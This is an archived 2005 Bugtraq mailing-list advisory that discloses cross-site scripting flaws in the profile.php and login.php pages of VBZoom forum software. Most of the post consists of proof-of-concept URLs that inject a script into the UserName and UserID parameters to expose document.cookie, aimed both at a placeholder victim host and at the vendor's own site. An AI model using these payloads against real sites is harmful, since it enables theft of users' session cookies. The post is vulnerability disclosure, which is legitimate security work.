[40062] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

VBZoom Cross Site Scripting Vulnerabilities

daemon@ATHENA.MIT.EDU (almaster@hotmail.com)
Tue Aug 2 14:06:30 2005

Date: 29 Jul 2005 11:38:35 -0000
Message-ID: <20050729113835.24904.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: almaster@hotmail.com
To: bugtraq@securityfocus.com

Hi All.

VBzoom

PROPLEM >>>THERE IS Cross site scripting IN FILE NAMED profile.php & login.php

EXPLIOT >>> http://www.victim.com/vbzoom/profile.php?UserID=1&UserName=<br><script>alert(document.cookie);</script>

EXPLIOT >>> http://Victim.com/vbzoom/login.php?UserID='<br><script>alert(document.cookie);</script>

EXAMPLE >>>http://www.vbzoom.com/vz/profile.php?UserID=1&UserName=<br><script>alert(document.cookie);</script>

EXAMPLE >>>http://www.vbzoom.com/vz/login.php?UserID='<br><script>alert(document.cookie);</script>

DISCOVERED BY >> aLMaSTeR [at] HotMail [dot] com
GREETS >>> FOR S4a.cc


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[40062] in bugtraq

VBZoom Cross Site Scripting Vulnerabilities

daemon@ATHENA.MIT.EDU (almaster@hotmail.com)Tue Aug 2 14:06:30 2005

daemon@ATHENA.MIT.EDU (almaster@hotmail.com)
Tue Aug 2 14:06:30 2005